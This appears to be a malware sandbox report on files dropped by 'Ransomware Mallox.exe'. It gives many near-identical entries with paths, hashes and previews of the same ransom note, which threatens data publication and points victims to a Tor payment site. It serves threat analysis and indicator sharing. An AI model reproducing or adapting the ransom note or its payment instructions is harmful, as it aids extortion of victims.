                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\sr-Latn-ME\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\sr-Latn-RS\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\sv-FI\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\sv-SE\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\tr-TR\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\uk-UA\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Microsoft\input\uz-Latn-UZ\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\LocalState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\RoamingState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\Settings\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\SystemAppData\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.Getstarted_8wekyb3d8bbwe\TempState\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.HEIFImageExtension_8wekyb3d8bbwe\AC\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.HEIFImageExtension_8wekyb3d8bbwe\AC\INetCache\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.HEIFImageExtension_8wekyb3d8bbwe\AC\INetCookies\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\user\AppData\Local\Packages\Microsoft.HEIFImageExtension_8wekyb3d8bbwe\AC\INetHistory\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
